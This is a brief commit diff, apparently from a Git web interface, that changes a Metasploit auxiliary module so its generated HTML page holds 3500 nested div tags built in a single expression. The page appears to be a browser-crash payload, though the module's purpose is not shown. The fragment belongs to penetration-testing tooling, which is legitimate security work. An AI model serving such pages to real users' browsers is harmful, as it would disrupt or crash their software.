improve div tags
parent
2eb97ea07b
commit
1d2519978d
|
@ -50,10 +50,7 @@ class MetasploitModule < Msf::Auxiliary
|
|||
</style>
|
||||
</head>
|
||||
<body>
|
||||
|
|
||||
html += "<div>" * 3500
|
||||
html += "</div>" * 3500
|
||||
html += %|
|
||||
#{'<div>' * 3500 + '</div>' * 3500}
|
||||
</body>
|
||||
</html>
|
||||
|
|
||||
|
|
Loading…
Reference in New Issue